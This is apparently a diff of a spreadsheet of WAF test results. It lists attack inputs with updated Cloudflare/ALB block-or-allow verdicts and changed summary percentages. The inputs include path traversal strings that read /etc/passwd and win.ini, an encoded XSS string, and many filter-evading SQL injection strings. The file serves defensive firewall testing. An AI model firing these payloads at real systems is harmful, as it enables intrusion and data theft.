       </c>
-      <c r="C147" s="6" t="inlineStr">
-        <is>
-          <t>CF_BLOCK</t>
+      <c r="C147" s="7" t="inlineStr">
+        <is>
+          <t>CF_ALLOW_ALB_ALLOW</t>
         </is>
       </c>
       <c r="D147" s="6" t="inlineStr">
@@ -27038,9 +27045,9 @@
           <t>../../../../../../etc/passwd</t>
         </is>
       </c>
-      <c r="C149" s="6" t="inlineStr">
-        <is>
-          <t>CF_BLOCK</t>
+      <c r="C149" s="10" t="inlineStr">
+        <is>
+          <t>NO_CF_LOG</t>
         </is>
       </c>
       <c r="D149" s="6" t="inlineStr">
@@ -27192,9 +27199,9 @@
           <t>../../../../etc/passwd</t>
         </is>
       </c>
-      <c r="C156" s="6" t="inlineStr">
-        <is>
-          <t>CF_BLOCK</t>
+      <c r="C156" s="10" t="inlineStr">
+        <is>
+          <t>NO_CF_LOG</t>
         </is>
       </c>
       <c r="D156" s="6" t="inlineStr">
@@ -27236,9 +27243,9 @@
           <t>../../../../../../windows/win.ini</t>
         </is>
       </c>
-      <c r="C158" s="6" t="inlineStr">
-        <is>
-          <t>CF_BLOCK</t>
+      <c r="C158" s="10" t="inlineStr">
+        <is>
+          <t>NO_CF_LOG</t>
         </is>
       </c>
       <c r="D158" s="6" t="inlineStr">
@@ -27302,9 +27309,9 @@
           <t>../../../../../../etc/passwd%00</t>
         </is>
       </c>
-      <c r="C161" s="6" t="inlineStr">
-        <is>
-          <t>CF_BLOCK</t>
+      <c r="C161" s="10" t="inlineStr">
+        <is>
+          <t>NO_CF_LOG</t>
         </is>
       </c>
       <c r="D161" s="6" t="inlineStr">
@@ -27852,9 +27859,9 @@
           <t>setTimeout('%61lert(1)',1000)</t>
         </is>
       </c>
-      <c r="C186" s="6" t="inlineStr">
-        <is>
-          <t>CF_BLOCK</t>
+      <c r="C186" s="7" t="inlineStr">
+        <is>
+          <t>CF_ALLOW_ALB_ALLOW</t>
         </is>
       </c>
       <c r="D186" s="6" t="inlineStr">
@@ -30140,9 +30147,9 @@
           <t>'%09OR%091=1</t>
         </is>
       </c>
-      <c r="C290" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C290" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D290" s="7" t="inlineStr">
@@ -30162,9 +30169,9 @@
           <t>'%20oR%201=1--</t>
         </is>
       </c>
-      <c r="C291" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C291" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D291" s="7" t="inlineStr">
@@ -30208,7 +30215,7 @@
       </c>
       <c r="C293" s="6" t="inlineStr">
         <is>
-          <t>CF_BLOCK</t>
+          <t>CF_ALLOW_ALB_BLOCK</t>
         </is>
       </c>
       <c r="D293" s="6" t="inlineStr">
@@ -30230,7 +30237,7 @@
       </c>
       <c r="C294" s="6" t="inlineStr">
         <is>
-          <t>CF_BLOCK</t>
+          <t>CF_ALLOW_ALB_BLOCK</t>
         </is>
       </c>
       <c r="D294" s="6" t="inlineStr">
@@ -30272,9 +30279,9 @@
           <t>' OR TRUE--</t>
         </is>
       </c>
-      <c r="C296" s="6" t="inlineStr">
-        <is>
-          <t>CF_BLOCK</t>
+      <c r="C296" s="7" t="inlineStr">
+        <is>
+          <t>CF_ALLOW_ALB_ALLOW</t>
         </is>
       </c>
       <c r="D296" s="6" t="inlineStr">
@@ -30316,9 +30323,9 @@
           <t>'%2f**%2fOR%2f**%2f1=1--</t>
         </is>
       </c>
-      <c r="C298" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C298" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D298" s="7" t="inlineStr">
@@ -30514,9 +30521,9 @@
           <t>0x27206f7220313d31--</t>
         </is>
       </c>
-      <c r="C307" s="6" t="inlineStr">
-        <is>
-          <t>CF_BLOCK</t>
+      <c r="C307" s="7" t="inlineStr">
+        <is>
+          <t>CF_ALLOW_ALB_ALLOW</t>
         </is>
       </c>
       <c r="D307" s="7" t="inlineStr">
@@ -30536,9 +30543,9 @@
           <t>%u0027%20OR%201=1--</t>
         </is>
       </c>
-      <c r="C308" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C308" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D308" s="7" t="inlineStr">
@@ -30580,9 +30587,9 @@
           <t>%27UNION%0ASELECT%0ANULL,NULL--</t>
         </is>
       </c>
-      <c r="C310" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C310" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D310" s="7" t="inlineStr">
@@ -30712,9 +30719,9 @@
           <t>1+oR+1=1</t>
         </is>
       </c>
-      <c r="C316" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C316" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D316" s="7" t="inlineStr">
@@ -30734,9 +30741,9 @@
           <t>1%0bOR%0b1=1</t>
         </is>
       </c>
-      <c r="C317" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C317" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D317" s="7" t="inlineStr">
@@ -30800,9 +30807,9 @@
           <t>'||mid(version(),1,1)=5</t>
         </is>
       </c>
-      <c r="C320" s="6" t="inlineStr">
-        <is>
-          <t>CF_BLOCK</t>
+      <c r="C320" s="7" t="inlineStr">
+        <is>
+          <t>CF_ALLOW_ALB_ALLOW</t>
         </is>
       </c>
       <c r="D320" s="6" t="inlineStr">
@@ -30976,9 +30983,9 @@
           <t>1'||'1</t>
         </is>
       </c>
-      <c r="C328" s="6" t="inlineStr">
-        <is>
-          <t>CF_BLOCK</t>
+      <c r="C328" s="7" t="inlineStr">
+        <is>
+          <t>CF_ALLOW_ALB_ALLOW</t>
         </is>
       </c>
       <c r="D328" s="6" t="inlineStr">
@@ -30998,9 +31005,9 @@
           <t>1'--</t>
         </is>
       </c>
-      <c r="C329" s="6" t="inlineStr">
-        <is>
-          <t>CF_BLOCK</t>
+      <c r="C329" s="7" t="inlineStr">
+        <is>
+          <t>CF_ALLOW_ALB_ALLOW</t>
         </is>
       </c>
       <c r="D329" s="6" t="inlineStr">
@@ -31042,9 +31049,9 @@
           <t>1%27--</t>
         </is>
       </c>
-      <c r="C331" s="6" t="inlineStr">
-        <is>
-          <t>CF_BLOCK</t>
+      <c r="C331" s="7" t="inlineStr">
+        <is>
+          <t>CF_ALLOW_ALB_ALLOW</t>
         </is>
       </c>
       <c r="D331" s="7" t="inlineStr">
@@ -31174,9 +31181,9 @@
           <t>1' --</t>
         </is>
       </c>
-      <c r="C337" s="6" t="inlineStr">
-        <is>
-          <t>CF_BLOCK</t>
+      <c r="C337" s="7" t="inlineStr">
+        <is>
+          <t>CF_ALLOW_ALB_ALLOW</t>
         </is>
       </c>
       <c r="D337" s="6" t="inlineStr">
@@ -31196,9 +31203,9 @@
           <t>%27%2F**%2FOR%2F**%2F1%3D1--</t>
         </is>
       </c>
-      <c r="C338" s="7" t="inlineStr">
-        <is>
-          <t>CF_ALLOW_ALB_ALLOW</t>
+      <c r="C338" s="6" t="inlineStr">
+        <is>
+          <t>CF_BLOCK</t>
         </is>
       </c>
       <c r="D338" s="7" t="inlineStr">
@@ -31284,9 +31291,9 @@
           <t>'||1</t>
         </is>
       </c>
-      <c r="C342" s="6" t="inlineStr">
-        <is>
-          <t>CF_BLOCK</t>
+      <c r="C342" s="7" t="inlineStr">
+        <is>
+          <t>CF_ALLOW_ALB_ALLOW</t>
         </is>
       </c>
       <c r="D342" s="6" t="inlineStr">
@@ -31306,9 +31313,9 @@
           <t>1-- -</t>
         </is>
       </c>
-      <c r="C343" s="6" t="inlineStr">
-        <is>
-          <t>CF_BLOCK</t>
+      <c r="C343" s="7" t="inlineStr">
+        <is>
+          <t>CF_ALLOW_ALB_ALLOW</t>
         </is>
       </c>
       <c r="D343" s="7" t="inlineStr">
@@ -31383,6 +31390,7 @@
         </is>
       </c>
     </row>
+    <row r="347"/>
     <row r="348">
       <c r="A348" s="8" t="inlineStr">
         <is>
@@ -31414,11 +31422,11 @@
         </is>
       </c>
       <c r="B350" t="n">
-        <v>151</v>
+        <v>137</v>
       </c>
       <c r="C350" t="inlineStr">
         <is>
-          <t>43.9%</t>
+          <t>39.8%</t>
         </is>
       </c>
     </row>
@@ -31429,11 +31437,11 @@
         </is>
       </c>
       <c r="B351" t="n">
-        <v>110</v>
+        <v>136</v>
       </c>
       <c r="C351" t="inlineStr">
         <is>
-          <t>32.0%</t>
+          <t>39.5%</t>
         </is>
       </c>
     </row>
@@ -31444,11 +31452,11 @@
         </is>
       </c>
       <c r="B352" t="n">
-        <v>0</v>
+        <v>14</v>
       </c>
       <c r="C352" t="inlineStr">
         <is>
-          <t>0.0%</t>
+          <t>4.1%</t>
         </is>
       </c>
     </row>
@@ -31459,11 +31467,11 @@
         </is>
       </c>
       <c r="B353" t="n">
-        <v>83</v>
+        <v>57</v>
       </c>
       <c r="C353" t="inlineStr">
         <is>
-          <t>24.1%</t>
+          <t>16.6%</t>
         </is>
       </c>
     </row>
